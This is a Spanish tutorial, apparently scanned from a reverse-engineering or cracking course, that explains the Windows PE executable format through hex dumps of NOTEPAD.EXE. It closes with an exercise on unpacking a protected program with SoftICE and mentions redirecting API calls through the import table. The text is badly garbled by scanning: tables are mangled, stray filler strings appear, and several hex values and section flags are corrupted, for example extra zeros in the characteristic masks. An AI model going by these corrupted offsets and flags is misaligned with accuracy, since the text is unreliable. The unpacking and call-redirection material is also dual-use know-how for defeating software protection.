e_ovno DW ? 
SIA 

; CAMPOS ADICIONALES 
SIA 
e_res DW 4 DUP (?) 

e_oemid DW ? 

e_oeminfo DW ? 

e_res2 DW 10 DUP (?) 

e_lfanew DD ? 

_IMAGE_DOS_ HEADER ENDS 
PIMAGE_DOS_HEADER TYPEDEF NEAR PTR _IMAGE_DOS_ HEADER 


Quien no entienda esta estructura puede orientarse por la siguiente tabla: 


Encabezado EXE MZ 


10000 [Word [ID "MZ - Etiqueta de archivo EXE 
10002 [Word [Número de bytes en la última página o bloque de 512 bytes del ejecutable. 
10004 [Word [Número de todas las páginas de 512 bytes en el ejecutable (incluyendo la última) 
10006 [Word [Número de entradas de la tabla de relocalizaciones 
10008 [Word [Tamaño del encabezado en parágrafos (16 bytes) 


0004 (Word Tamaño mínimo de los parágrafos de memoria localizada por encima del final del programa ya 


cargado en RAM. 

Tamaño máximo de los parágrafos de memoria localizada por encima del final del programa 
000C ¡Word 

ya cargado en RAM. 


000E ¡Word ¡[SS (Stack Segment) relativo al inicio del ejecutable 
0010 ¡Word |SP (Stack Pointer) inicial 


0012 (Word Checksum o 0. Valor de verificación de la suma de las palabras en el ejecutable, usado para 


verificar la validación por posibles datos perdidos. 


0014 ¡Dword ¡CS:IP relativo al inicio del ejecutable (Entry point = Punto de entrada) 
0018 Word Desplazamiento (offset) de la tabla de relocalización. 

40h para los nuevos (NE, LE, LX, W3, PE, etc) ejecutables 
001A [Word ¡Número de traslape (0 = programa principal) 


El primer campo de esta estructura, en el desplazamiento 0000, hay dos caracteres: "MZ", que indican que se trata de un 
archivo ejecutable .EXE. 


Si abrimos con HEX WORKSHOP u otro editor hexadecimal un archivo .EXE de DOS, por ejemplo DEBUG.EXE, 
generalmente ubicado en el directorio CAWINDOWSICOMMAND, veremos en la parte izquierda, en la ventana que 
despliega caracteres en ASCII, que en el desplazamiento 0000 hay dos caracteres: "MZ. Es el número mágico que 
identifica los archivos .EXE. 


A este antiguo encabezado EXE MZ se le han agregado algunos campos que informan al cargador del Sistema Operativo 
(SO) dónde está el encabezado PE con información relevante para W32. 


Encabezado MZ Extendido 


Desplazamiento del nuevo encabezado EXE desde el inicio del archivo o 0 si es un archivo 
003C  [Dword MZ EXE 


El último campo de esta extensión, 'e_Ifanew', indica la dirección donde está la signatura que identifica el formato del 
archivo. Si se trata de un archivo con un programa W32, este campo apunta a dos caracteres: "PE" (Portable Executable), 
el formato elegido por M$ para los archivos con programas W32. 


Si abrimos NOTEPAD.EXE con con HEX WORKSHOP y revisamos el campo e_Ifanew en el desplazamiento 003Ch, 
veremos el número 8000h, que al revés es 0080h, el desplazamiento donde veremos los caracteres 'PE', que identifican el 


formato del archivo (Si trabajas con HEX WORKSHOP, no cierres todavía este archivo). Si ahora abrimos con HEX 
WORKSHOP el archivo WINFILE.EXE, generalmente ubicado en el directorio CAWINDOWS, veremos que el 
desplazamiento 003Ch apunta al desplazamiento 0400h, donde encontramos los caracteres 'NE', que es el formato de los 
archivos W16. 


Inmediatamente después de la signatura hay dos bytes o una palabra (WORD) con ceros, después de los cuales inicia el 
encabezado PE. En la actualidad, el formato NE está practicamente extinguido. Lo pasaré por alto y me concentraré en el 
formato PE. 


Entre el encabezado MZ DOS y la signatura PE, está la seccuón "STUB" del archivo, la cual se incluye para el 
despliegue de un mensaje que indica que el programa sólo puede correr en Windows. 


¿32 BITS?: MÁS CABEZAS 


Dos bytes delante de la signatura se inicia el encabezado PE, cuya estructura es: 


_IMAGE_FILE_HEADER STRUC 

Machine DW ? 

NumberOfSections DW ? ; No. de secciones 

TimeDateStamp DD ? 

PointerToSymbolTable DD ? ; Dir. de la tabla de símbolos 
NumberOfSymbols DD ? ; No. de simbolos 
SizeOfOptionalHeader DW ? ; Tamaño del proximo encabezado 
Characteristics DW ? 

_IMAGE_FILE_HEADER ENDS 


PIMAGE_FILE_HEADER TYPEDEF NEAR PTR _IMAGE_FILE_HEADER 
IMAGE_SIZEOF_FILE_HEADER EQU 20 


Traduzcamos ésta a estructura a una tabla a desplazamientos: 


Encabexado PE 


CPU_TYPE = Tipo de CPU 

0000 - Desconocido 0162 - MIPS I 
0000 [Word 014c - 80386 0163 - MIPS ll 

014d - S0486 0166 - MIPS III 

014e - 80586 


10002 [Word [Número de objetos en la tabla de Objetos 
10004 [Dword Estampa Tiempo 
10008 — [SBytes [Puntero ala tabla de simbolos 
10010 [Word [Tamaño del encabezado siguiente, encabezado opcional NT 


Banderas 
0012 [Word 0 - Imagen del Programa  — 2-EXE 
200 - Dirección fijada 2000 - Librería 


Uno de los campos más importantes de este encabezado es el segundo, en el desplazamiento 0004 desde el inicio del 
encabezado, que indica el número de secciones en el que se divide el ejecutable. Podemos ver en el volcado de 
NOTEPAD.EXE en HEX WORKSHOP, en el desplazamiento 0086h, el valor 0600h, que invertido es O0O06h, el número 
de secciones que hay en el archivo. 


Como dijimos al comienzo, el formato PE divide su contenido en varias secciones con información de tipo específico. El 
campo NumberOfSections indica este número. 


Otro campo que puede ser de utilidad es SizeOfOptionalHeader, que indica el tamaño del encabezado opcional, 
inmediatamente después del encabezado PE. Este valor para NOTEPAD.EXE está en el desplazamiento 94h y es EO00h, 
que invertido es OOEOh=224D, es decir, el encabezado opcional tiene un tamaño de 224 bytes. 


OTRA CABEZA MÁS 


Inmediatamente después inicia el encabezado opcional NT. Randy Katz, en su clásico artículo de 1993, "The Portable 
Executable File Format from Top to Bottom", divide este encabezado opcional en dos partes, una con campos standard y 
otra con campos adicionales: 


_IMAGE_OPTIONAL_HEADER STRUC 

SIA ALI 

; CAMPOS STANDARD 

SILA ALI 

Magic DW ? 

MajorLinkerVersion DB ? 

MinorLinkerVersion DB ? 

SizeOfCode DD ? ; Tamaño del codigo 

SizeOfTnitializedData DD ? ; Tamaño de datos inicializados 
SizeOfUninitializedData DD ? ; Tamaño de datos no inicializados 
AddressOfEntryPoint DD ? ; Dir. virtual del punto de entrada del prog. 
BaseOfCode DD ? ; Dir fisica de la base del cod. 

BaseOfData DD ? ; Dir fisica de los datos 
AAN 

; CAMPOS ADICIONALES NT 
AAA 

ImageBase DD ? ; Dir virtual de la base de la img. 
SectionAlignment DD ?, Alineamiento de secc. 

File Alignment DD ? ; Alinamiento de archivo 
MajorOperatingSystemVersion DW ? 

MinorOperatingS ystemVersion DW ? 

MajorImage Version DW ? 

MinorImageVersion DW ? 

MajorSubsystemVersion DW ? 

MinorSubsystemVersion DW ? 

Reservedl DD ? 

SizeOflmage DD ? ; Espacio reservado en memoria para el archivo 
SizeOfHeaders DD ? ; Tamaño del conjunto de los encabezados 
CheckSum DD ? 


Subsystem DW ? 

DliCharacteristics DW ? 

SizeOfStackReserve DD ? 

SizeOfStackCommit DD ? 

SizeOfHeapReserve DD ? 

Size OfHeapCommit DD ? 

LoaderFlags DD ? 

NumberOfRvaAndSizes DD ? 

DataDirectory_IMAGE_DATA_ DIRECTORY 16 DUP (<> ) ; Tabla de directorios 
_IMAGE OPTIONAL_HEADER ENDS ; de secciones 


PIMAGE_OPTIONAL_HEADER TYPEDEF NEAR PTR _IMAGE_OPTIONAL_HEADER 


A continuación la tabla de desplazamientos equivalentes para esta estructura: 


Encabezado opcional NT 


Campos Estandard 
MO MA RA 
10002 [Word [Versión delenlazador (LINKER) 
10004  [Dword [Tamaño de la sección o segmento de código 
10008  [Dword [Tamaño de la sección de datos inicializados 


0010 Dword Tamaño de la sección de datos no inicializados 
0014 Dreta Dirección virtual del punto de entrada (RVA: Relative Virtual Address) - La 
ejecución comienza aquí. 


10018 [Dword  [Basedela sección de Código 
001C — [Dword  Basedelasección de datos 
Campos Adicionales 
10020 [Dword  Basedela Imagen - inicio de la imagen en la memoria virtual. 
10028  [Dword Alineamiento del Archivo (Potencia de 2 512-64k) 
10032 [Dword Versión requerida de sistema operativo 
MOE A Rea 
10044 — [|Dword [Tamaño dela imagen: espacio reservado en memoria para el archivo. 
10048 Dra ama del naa 
1005C  [Dword ¡Suma de chequeo del archivo 


Subsistema 
005E Word 0 - Desconocido  1- Nativo 
2 - Win GUI 3 - Carácter Win 


0060 Word Banderas DLL 
0064 Dword Memoria reservada para la pila (stack) 


0078 [Dword— trogastas entradas RVA tienen tamaño Dword 


CAMPOS CRÍTICOS DEL ENCABEZADO 


- Tamaño de las secciones - 


Para montar el ejecutable, W32 necesita reservar espacio en memoria. Como hemos adelantado, W32 no divide la 
memoria en segmentos de 64KB como lo hacía DOS sino en secciones de tamaño variable. Los campos SizeOfCode, 
SizeOfTnitializedData y SizeOfUninitializedData, informan el espacio de memoria que el sistema debe reservar para 
cargar cada una de estas secciones. 


Estos valores para NOTEPAD.EXE, tal como puede verse en los desplazamientos 009Ch, OOAO0h y 00A4h, 
respectivamente son 0000 3A00h (tamaño de la sección de código), 0000 4600h (tamaño de la sección de datos 
inicializados) y 0000 0000h (no hay sección de datos no inicializados). 


- Punto de entrada (RVA Entry Point) - 


Otro dato que necesita el sistema para ejecutar el programa en el archivo es el punto de entrada, es decir, la dirección de 
la primera instrucción del programa. Esta información se encuentra en el campo AddressOfEntryPoint, que sigue al 
campo SizeOfUninitializedData del encabezado opcional NT. Para NOTEPAD.EXE este valor, en el desplazamiento 
00A8h, es 0010 0000h, que invertido es 0000 1000h. 


RVA es la abreviatura de Relative Virtual Address, que en español significa Dirección Virtual Relativa. Significa una 
dirección virtual, no real, relativa a la base del archivo. El valor de la base del archivo se encuentra en el campo 
ImageBase (Base de la Imagen). 


- Bases de las secciones - 


Los campos BaseOfCode y BaseOfData indican las direcciones virtuales relativas (RVAs) a la base del archivo de la 
sección de código y de la sección de datos, respectivamente. En NOTEPAD.EXE, estos valores se encuentran en los 
desplazamientos OODACH y O0BOHh y son, respectivamente, 0000 1000h para la sección de código, y 0000 5000h para la 
sección de datos. 


Observa que, para NOTEPAD.EXE, la base del código (BaseOfCode) coincide con el punto de entrada del programa 
(EntryPoint). Quiere decir que el programa inicia en la primera instrucción de la sección de código. 


- Base de la imagen (Image Base) - 


Es la dirección virtual relativa a la base del archivo. Esta información la suministra el campo ImageBase del conjunto de 
campos opcionales del encabezado opcional NT (estructura _IMAGE_OPTIONAL_HEADER). Para NOTEPAD.EXE, 
este valor está en el desplazamiento 00B4h y es 0000 0040, invertido 0040 O0000h. La experiencia dice que este es el 
valor por defecto elegido por los enlazadores como base para los archivos EXE con formato PE. 


Entonces, en el caso de NOTEPAD.EXE, el programa inicia en la dirección virtual Base_de_la_Imagen + 
Punto_de_Entrada: 0040 0000h + 0000 1000h = 0040 1000h. 


Generalmente, 0040 1000h es la dirección virtual de la entrada de los programas en archivos ejecutables con formato PE. 


Esto lo podemos comprobar rápidamente ejecutando NOTEPAD.EXE con el cargador (LOADER) de SICE. Veremos en 
la ventana desplegada por SICE al detenerse en la primera instrucción que el depurador (DEBUGGER) apunta a la 
dirección 00401000h. 


- Alineamientos - 


Para el archivo con formato PE se dan dos alineamientos. El alineamiento de las secciones, campo SectionAlignment, y 
alineamiento de archivo, campo File Alignment. Estos campos son relevantes porque determinan cuanta memoria destina 
el sistema para las secciones y el archivo. 


Los ejecutables W32 no están divididos en segmentos de hasta 64 KB, como en DOS, sino en secciones cuyo tamaño es 
el múltiplo de una página de memoria. El tamaño de una página de memoria es de 4 KB. Si una sección ocupa 8 páginas 
de memoria, su tamaño es de 8*4=32 KB. 


Cada sección del archivo PE es cargada secuencialmente en el espacio de direcciones de un proceso, comenzando en 


ImageBase. El campo SectionAlignment dicta la cantidad mínima de espacio que una sección puede ocupar cuando es 
cargada --es decir, las secciones están alineadas sobre los límtes o fronteras de SectionAlignment. 


El alineamiento de sección no puede ser menor al tamaño de una página (generalmente 4096 bytes en la plataforma x86) 
y debe ser, en todo caso, un múltiplo del tamaño de la página, tal como dicta el manejador de memoria virtual de 
Windows. El enlazador (LINKER) establece un valor de 4096 bytes por defecto, pero esto puede establecerse usando del 
conmutador de enlazador: -ALIGN. 


Por ejemplo, si una sección del programa tiene un tamaño de 1200 bytes, el enlazador asignará a esta sección una página, 
es decir 4096 bytes. Entonces, cuando el programa sea cargado en RAM, el sistema comprometerá una página de 
memoria física para esta sección. 


Para NOTEPAD.EXE, SectionAlignment se encuentra en el desplazamiento OB8h y tiene un valor de 0000 1000h = 
4096 bytes, que es el tamaño de una página. 


El campo File Alignment informa sobre la granularidad mínima de trozos (chunks) de información dentro de la imagen 
antes de ser cargada. Por ejemplo, el enlazador llena con ceros (zero-pads) un cuerpo de sección (datos brutos [raw data] 
para una sección) por encima del límite o frontera más cercana de File Alignment en el archivo. Este valor, 
FileAlignment, está restringido a ser una potencia de 2 entre 512 y 65,535. En el archivo PE, los datos brutos que 
comprenden cada sección deben comenzar en un múltiplo de FileAlignment. El valor por defecto es 512 bytes, 
probablemente para asegurar que las secciones siempre inicien en el comienzo de un sector del disco (un sector de disco 
tiene un tamaño de 512). 


En NOTEPAD.EXE, FileAlignmentse encuentra en el desplazamiento OBCh y tiene un valor de 0000 0200h = 512 bytes. 
- Tamaño de la imagen - 


Otro campo indispensable es SizeOflmage, ya que para montar el archivo W32 necesita reservar espacio en memoria. 
Esta información se encuentra en el campo SizeOfImage. Este valor no es propiamente el tamaño del ejecutable sino la 
cantidad de espacio que se reserva en el espacio de direcciones para cargar el ejecutable. Este número depende bastante 
del valor SectionAlignment. 


Si un archivo tiene seis secciones, alineadas sobre fronteras de 65,536 bytes, el campo SizeOflmage debería ser 6 * 
65.536 = 393.216 bytes (96 páginas). El mismo archivo enlazado con un alineamiento de sección de 4096 bytes (1 
página) debería dar 6 * 4096 = 24576 bytes (6 páginas) en el campo SizeOfImage. Pero esto sólo es así si todas las 
secciones tienen el mismo tamaño. Puede haber secciones con un tamaño mayor al de una página, lo cual cambia el valor 
de SizeOfImage. 


Podemos calcular SizeOflmage para NOTEPAD.EXE. Tiene 6 secciones y su valor SectionAlignement es 1000h = 4096 
bytes, entonces SizeOflmage debería ser 6 * 1000h = 6000h, sin embargo este no es el caso. 


En NOTEPAD.EXE SizeOfImage está en el desplazamiento OODOh, cuyo contenido es DOCO 0000h, que invertido es 
0000 COOOh. Esto es así porque seguramente hay secciones con un tamaño mayor a una página de memoria. 


- Directorio de Datos - 


Al final del encabezado opcional hay un directorio, que ocupa el campo DataDirectory. Se trata de un vector o arreglo 
(array) que guarda las direcciones donde se encuentran las tablas de datos de las secciones del archivo. Cada una de estas 
entradas tiene un tamaño de 8 bytes y se divide en dos campos. El primero indica la dirección virtual relativa a la base 
donde se encuentra la tabla con datos acerca de alguna sección. El otro campo dice el tamaño de la tabla. Cada entrada de 
este directorio tendría entonces la siguiente estructura: 


_IMAGE DATA DIRECTORY STRUC 

VirtualAddress DD ? ; Dirección virtual donde está la tabla 
Size DD ? ; Tamaño de la tabla 
_IMAGE_ DATA DIRECTORY ENDS 


PIMAGE_DATA_DIRECTOR Y TYPEDEF NEAR PTR _IMAGE_DATA_DIRECTORY 


El número de entradas del directorio está indicado en el campo NumberOfRvaAndSizes del encabezado opcional. 
Generalmente este valor es 0000 0010h=16D. El tamaño del directorio de datos sería el valor igual al número de entradas 
por ocho bytes de cada entrada. En este caso es 128 bytes. En NOTEPAD.EXE este valor está en el desplazamiento 
00F4h y contiene 1000 0000, que invertido es 0000 0010h = 16d, es decir, 16 entradas en el directorio de datos. 


De acuerdo al archivo WINNT. H, las siguientes son las entradas del direcorio de datos. 


; Números correspondientes a las entradas del directorio de datos 


IMAGE_DIRECTORY_ENTRY_EXPORT EQU 0 
IMAGE_DIRECTORY_ENTRY_IMPORT EQU 1 
IMAGE_DIRECTORY_ENTRY_RESOURCE EQU 2 
IMAGE_DIRECTORY_ENTRY_EXCEPTION EQU 3 
IMAGE_DIRECTORY_ENTRY_SECURITY EQU 4 
IMAGE_DIRECTORY_ENTRY_BASERELOC EQU 5 
IMAGE_DIRECTORY_ENTRY_DEBUG EQU 6 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT EQU 7 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR EQU 8 
IMAGE_DIRECTORY_ENTRY_TLS EQU 9 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG EQU 10 


El número que se asigna a cada entrada de directorio de datos se emplea para facilitar las rutinas de búsqueda de 
información sobre las secciones. 


VERIFIQUEMOS 


Ahora cerremos HEX WORKSHOP. Tomemos nota de los valores que hemos encontrado. Abramos NOTEPAD.EXE en 
EXESCOPE o en PROCDUMP y comparemos los valores desplegados con los que hemos obtenido hasta ahora. Para 
esta evaluación es mejor usar EXESCOPE ya que muestra el nombre de los encabezados y los desplazamientos donde 
están los datos. 


Comparemos entonces... Nada mal ¿cierto? 


Este proceso de ubicación manual, que puede ser tan engorroso hacerlo de esta manera, lo realiza el cargador de 
Windows de una manera muy rápida y automática. También es el mismo proceso seguido por los volcadores y editores 
de encabezados de archivos PE. 


MÁS CABEZAS ¡HASTA CUÁNDO! 


La información sobre las secciones del archivo PE se encuentra en las tablas de secciones, después del encabezado 
opcional están, ordenadas secuencialmente. Cada una de estas tablas tiene la siguiente estructura: 


_IMAGE_SECTION_HEADER STRUC 

Name DB 8 DUP ( ? ) ; Cadena con el nombre de la sección 
3 

; Misc 

3 

tag$0 <> 

VirtualAddress DD ? 

Size OfRawData DD ? 

PointerToRawData DD ? 

PointerToRelocations DD ? 


PointerToLinenumbers DD ? 
NumberOfRelocations DW ? 
NumberOfLinenumbers DW ? 
Characteristics DD ? 

_IMAGE _SECTION_HEADER ENDS 


PIMAGE_SECTION_HEADER TYPEDEF NEAR PTR _IMAGE_SECTION_HEADER 


tag$0 UNION 
PhysicalAddress DD ? 
VirtualSize DD ? 
tag$0 ENDS 


Espero que ya no se necesite presentar esta estructura con una tabla de desplazamientos. 


El primer campo de la tabla es una arreglo (array) de 8 bytes de largo donde se escribe una cadena de caracteres con el 
nombre de la sección. Sigue una unión con el tamaño virtual de la sección. Luego el campo VirtualAddress es la 
dirección virtual relativa a la base de la imagen donde se encuentra la sección. 


Size OfRawData es el tamaño del FileAlignment relativo al cuerpo de la sección. El tamaño actual del cuerpo de la 
sección será menor o igual al múltiplo de FileAlignment. Una vez que la imagen es cargada dentro del espacio de 
direcciones de un proceso, el tamaño del cuerpo de la sección llega a ser menor o igual a un multiplo de 


SectionAlignment. PROCDUMP despliega este campo bajo el nombre "RAW DATA". 


PointerToRawData es el desplazamiento a la localización del cuerpo de la sección en el archivo. PROCDUMP llama a 
este campo "RAW OFFSET". 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos inicializados 
o no inicializados, si se puede escribir y leer sobre la sección, si es 

ejecutable, si es compartible, etc. PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las 
equivalencias: 


- 0OOO0000020h __Código. 

- 0O00000040h __Datos inicializados. 

- 0OO0000080h __Datos no inicializados. 

- 040000000h __ Sección cacheable. 

- 080000000h __Sección paginable. 

- 100000000h __ Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Por ejemplo, si las características es ED000020H, entonces se trata de una sección en la que 


1. se pueden escribir datos 80000000h 
2. se pueden leer datos 40000000h 


3. se pueden compartir datos 10000000h 
4. hay código 00000020h 


E0000020h 
Se trata de una sección con código ejecutable. Esta comúnmente lleva como nombre .text. 
Hay una tabla de estas para cada sección. NOTEPAD.EXE tiene seis secciones, por lo que tiene seis tablas de secciones. 
Abramos de nuevo NOTEPAD.EXE con el editor hexadecimal. 


En NOTEPAD.EXE la primera tabla se encuentra en el desplazamiento 0178h. Visualmente es simple ubicarla con el 
editor hexadecimal ya que cada tabla se inicia con el campo Name, que es un campo de ocho bytes con una cadena de 
caracteres ASCH con el nombre de la sección. El nombre de la primera sección en NOTEPAD.EXE es .text. Es el 
nombre que por defecto se asigna a la sección con código ejecutable. 


Hay varias secciones predefinidas, cuyos nombres son: 


- Sección de código ejecutable: .text 

- Secciones de datos: .bss, .rdata, .data 

- Sección de recursos: .rsrc 

- Sección de datos exportados: .edata 

- Sección de datos importados: .idata 

- Sección de información para depuración: .debug 


"Export" contiene información sobre los nombres que exporta el programa y pueden ser solicitados y usados por otros 
procesos. 


"Import" indica las funciones que el programa solicita a otros; generalmente son funciones que se encuentran en las DLL 
del sistema, donde se encuentran las funciones de la API de Windows, que son incluidas en los prototipos que definen las 
funciones empleadas en el programa. 


"Resources" contiene información sobre los recursos que contiene el programa: menúes, diálogos, iconos, bitmaps, 
cadenas de texto, etc. 


"Debug" es la sección donde el enlazador, si así lo quizo el programador, guarda información para facilitar la depuración 
del programa, con un depurador (debugger). 


El siguiente campo de una entrada del directorio de datos, después del nombre, es una unión con el tamaño de la sección. 
La dirección virtual donde se encuentra la sección está en el campo VirtualAddress. La dirección física de la sección está 
en PointerToRawData. 


TABLAS DE DATOS 


Cada sección tiene una tabla, generalmente al comienzo, con información particular sobre ella. 


Para localizar una tabla de éstas, se determina su dirección virtual relativa (RVA: RELATIVA VIRTUAL ADDRESS). 


Este valor está en el primer campo de la entrada correspondiente en el directorio de datos. Luego se usa esta dirección 
virtual para determinar en cuál sección está. 


La dirección física de la sección nos la dá el campo PointerToRawData de la tabla de sección. La tabla de datos de la 
sección está en un desplazamiento igual al dato en el campo VirtualAddress en la entrada del directorio de datos, al final 
del encabezado opcional, menos el dato del campo VirtualAddress en la tabla de sección correspondiente. Este 
desplazamiento es relativo a la dirección en el campo PointerToRawData. 


Como vimos, las tablas de secciones se encuentran inmediatamente después del directorio de datos, es decir después del 
encabezado opcional. 


Con la dirección física del desplazamiento a la primera tabla de las secciones de la imagen, con el número de secciones 
de la imagen (en el campo NumberOfSection del encabezado PE, la RVA donde inicia la sección, la RVA de la tabla de 
datos de la sección y el puntero a los datos brutos de 

la sección PointerToRawData, puedo localizar donde se hallan los datos que conforman la tabla de datos de una sección. 


Como ilustración localicemos la tabla de la sección de nombres importados .idata en NOTEPAD.EXE. 


Primero buscamos en el directorio de datos la entrada que corresponde a .idata. Es la entrada número 1, es decir, la 
segunda porque la primera es la número O (véase los números correspondientes a las entradas del directorio de datos). En 


NOTEPAD.EXE localizamos esta entrada en el desplazamiento 0100h, que inicia con el campo Virtual Address de la 
entrada del directorio que dice la dirección virtual donde se ubica la tabla de datos de la sección .idata. El valor es 0070 
0000, que invertido es 0000 7000h. 


Luego localizamos el segundo campo de la tabla de sección correspondiente a .idata. Este campo se llama también 
VirtualAddress e indica la dirección virtual donde inicia la sección. Para encontrarlo manualmente, buscamos la cadena 
".idata"; la tabla de sección correspondiente a esta sección inicia en el deplazamiento donde hallamos esa cadena. Este 
campo se ubica, en NOTEPAD.EXE, en O1FO0. El campo Virtual Addres de esta sección estará entonces en O1FC, ya 
que el primer campo, donde está la cadena con el nombre, tiene 8 bytes y el siguiente campo, con el tamaño de la 
sección, tiene 4 bytes. El valor en O1FC es 0000 7000h. Quiere decir que la tabla de datos de la sección se encuentra en 
el inicio de ésta. 


Ya que hemos localizado la tabla de seccción, obtenemos el valor del campo PointerToRawData. Este campo lo 
ubicamos en 0204, y contiene 0042 0000, que invertido es 0000 4200h. Es el desplazamiento del archivo donde están los 
datos brutos de la sección. 


Con estos datos ya podemos localizar la tabla de datos de la sección .idata en NOTEPAD.EXE. Resto la dirección virtual 
de la sección (campo VirtualAddress de la tabla de sección) a la dirección de la tabla de datos de esa sección (campo 
VirtualAddress en el directorio de datos). En este caso, la diferencia es cero: la tabla de datos está al inicio de la sección. 
A la diferencia obtenida le sumo el valor del campo PointerToRawData y obtengo el desplazamiento donde se encuentra 
la tabla de datos de la sección .idata. Como la dirección virtual de la sección coincide con la dirección de su tabla de 
datos, el desplazamiento dentro del archivo, donde se encuentra la tabla de datos de la sección .idata, coincide el valor en 
PointerToRawData: 4200h. 


Puede parecer un proceso muy complejo. Pero basta imaginar lo que significaría que el cargador del SO tuviera que 
buscar de manera secuencial en un ejecutable de 3.2 MB, por ejemplo, qué funciones el programa importa de las librerías 
DLL del sistema. 


Bien, ahora que hemos localizado la tabla de datos de la sección, podemos buscar en ella los nombres importados. 


La tabla de datos de la sección de datos importados tiene también una estructura de directorio, es decir, es una tabla con 


varias entradas con la misma estructura cada una. Por este motivo podemos llamar a esta tabla Directorio de Datos 
Importados, cuyas entradas tienen la siguiente estructura, que llamamos IMAGE_IMPORT_DESCRIPTOR: 


IMAGE_IMPORT_DESCRIPTOR struc 
dwRVAFunctionNameList DWORD ? ; 
TimeDateStamp DWORD ?; 
ForwarderChain DWORD ?; 
dwRVAModuleName DWORD ?; 
dwRVAFunctionAddressList DWORD ?2; 
IMAGE _IMPORT_DESCRIPTOR ends 


PIMAGE_IMAGE_IMPORT_DESCRIPTOR TYPEDEF PTRIMAGE_IMPORT_DESCRIPTOR 


Hay tantas entradas de este tipo como módulos importados sean importados. Es decir, hay una entrada ImportDirectory 
para cada módulo importado. 


El primer campo, dwRVAFunctionNameList, apunta a un arreglo (array) de punteros a estructuras llamadsa 
IMAGE_IMPORT_BY_NAME, que son las listas con los nombres y ordinales de las funciones a usar del módulo 
importado. 


TimeDateStamp indica cuando el archivo fue fabricado. 


Uno de los campos importantes de esta estructura es dwRV AModuleName, una dirección virtual relativa a la base que 
apunta al nombre del módulo importado. 


Si resto al valor de dwRV AModuleName la dirección virtual de la sección, obtengo el desplazamiento desde el inicio de 
la sección. 


En NOTEPAD.EXE, el campo dwRV AModuleName está en el desplazamiento 4200h + 4 + 4 + 4 = 420Ch, y contiene 
E874 0000, que invertido es 0000 74E8h. La dirección virtual de la sección .idata es 7000h. Entonces el nombre del 
primer módulo importado se encuentra en: 


0000 74E8h - 0000 70000h = 0000 04E8h + 0000 4200h = 0000 46E8h. 


En el desplazamiento 46E8h encuentro una cadena con el primer módulo importado por NOTEPAD.EXE: Shel132.dll. 
Este nombre estará antecedido por el nombre de una de las funciones importadas del módulo y estará seguido por las 
demás funciones. 


El campo dwRVAFunctionNameList apunta a la lista de punteros a los nombres de las funciones importadas en el 
módulo. Confirmemos esto en NOTEPAD.EXE. 


El campo dwRVAFunctionNameList está en 4200h y contiene 0000 7160h, lo que indica que la lista de punteros a 
nombres importados del módulo correspondiente está en: 


0000 7160h - 0000 70000h = 0000 0160h + 4200h = 0000 4360h. 


El valor en este desplazamiento es 000 74D8. Es la dirección virtual de la lista de nombres: 


0000 74D8 - 0000 7000 = 0000 04D8h + 4200h = 0000 46D8h. 


Si vamos a esta dirección encontraremos que contiene el número 004Eh, seguido por la cadena 'ShellExecuteA"'. El 
primer número es el ordinal de exportación de la función con que inicia la lista de nombres importados del módulo, y la 
cadena es el nombre de la función. El ordinal es un número de referencia que puedo emplear para llamar a la función 
importada si no poseo su nombre. 


El campo dwRVAFunctionAddressList es sumamente importante. Apunta también a un arreglo (array) donde el cargador 
de W32 coloca la dirección virtual del punto de entrada de la función importada. Esto es de sumo interés: cuando el 
cargador monta el programa en RAM llena este arreglo con las direcciones virtuales donde inician las funciones 
importadas. Cuando el programa llama a una de estas funciones lo hace indirectamente a través de una llamada como 
esta: 


¡mp [RVA del THUNK] 


El campo dwRVAFunctionAddressList está, en NOTEPAD, en 0000 4210h, y contiene el valor 0000 7370h, ya 
invertido. Quiere decir que apunta a: 


7370 - 7000 = 0370 + 4200 = 4570h : <-- dwRVAFunctionAddressList 
Anota este número. 
Ahora fíjate. Desensambla NOTEPAD.EXE con W32DASM. Busca la cadena "ShellExecuteA" hasta llegar a: 


* Reference To: SHELL32.ShellExecuteA, Ord:004Eh | 
:00402DEE FF1570734000 Call dword ptr [00407370] 


Es una típica llamada a una función API de W32. Tiene la forma "CALL DWORD PTR [THUNK RVA]. "THUNK 
RVA" es la RVA donde el cargador de W32 coloca la dirección virtual donde inicia la función importada en el espacio 
de direcciones del proceso. Si con un programa como OFFSET (de Ieczelion) o OFFCAL (de MrCrimson) revisas el 
desplazamiento en el archivo que corresponde a la dirección de memoria 00407370, verás que esta dirección corresponde 
al desplazamiento 000 4570h, el mismo apuntado por el campo dwRVAFunctionAddressList correspondiente a la 


información sobre "ShellExecuteA”. 


No olvides esto último, porque es muy útil para redirigir los llamados a funciones de la API de W32. 


Tenemos ya una idea de como se estructura el encabezado significado de sus campos. Todavía queda analizar otras 
importantes secciones predefinidas, como la sección de recursos .rcrs. Es una de las secciones más atractivas de los 
archivos PE. Debido a la complejidad de su estructura, prefiero diferir por ahora su análisis, ya que implica un concepto 
fundamental para el programador: árbol de búsqueda. Se trata de un concepto de datos estructurados que merecería una 
atención especial. 


De todos modos hagamos un ejercicio para consolidar conocimientos. 


Os 
Vi 


Al Atake 


DESEMPAQUETANDO EJECUTABLES 


Como ejercicio podemos tomar cualquier archivo ejecutable y examinar el encabezado con un editor hexadecimal, anotar 
los valores críticos y después comprobar si hemos acertado con cualquier volcador (dumper) de archivos PE, como 
EXESCOPE o PROCDUMP. 


Empleemos PROCDUMP y tomemos como víctima SNIPPETCREATOR de Iczelion. 

Se trata de un fabuloso programa ideado por un experto en W32 ASM. Además de permitir editar los encabezados de los 
archivos PE, sirve para insertar SNIPPETS (recortes) en archivos PE. En otras palabras, este programa permite insertar 
código en ejecutables, no sólo cambiar unos cuantos bytes, sino rutinas enteras. 


Para ver un poco la importancia de conocer los encabezados PE, este programa resulta ejemplar. Veamos. 


Supongamos que queremos hacer una lista muerta de SNIPPETCREATOR. Lo abrimos con WDASM232 8.9 o con IDA. 
¡Qué extraño!. No vemos llamado a ninguna APT W32. 


Carguemos el programa con SICE ¡Cáspita!, ¿qué pasa...?. No se despliega el programa en la ventana de SICE. Se abre 
directamente. 


Ahora despleguemos SICE (ctrl+D). Instalemos un BRKP: BPX GetModuleHandleA. Ahora ES y volvemos a Win. 
Iniciemos SNIPPETCREATOR. ¡Ahora sí! Se despliega SICE. Tecleamos F11 y ya estamos en SNIPPETCREATOR. 
